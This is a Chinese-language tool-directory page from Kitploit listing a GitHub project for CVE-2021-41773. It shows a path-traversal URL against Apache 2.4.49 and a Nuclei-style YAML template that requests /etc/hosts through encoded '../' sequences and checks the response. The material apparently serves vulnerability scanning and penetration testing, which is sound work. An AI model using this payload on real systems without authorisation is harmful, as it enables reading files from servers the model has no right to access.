Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41773 — CVE-2021-41773 | Kitploit
工具/GitHubGitHub/numanturle/cve-2021-41773
漏洞扫描器漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnumanturle/cve-2021-41773

CVE-2021-41773

CVE-2021-41773

查看仓库
8424年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

https://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts

root@kitploit:~
id: CVE-2021-41773

info:
  name: Apache 2.4.49 Exploit
  author: numanturle
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "127.0.0.1"

      - type: status
        status:
          - 200
下载工具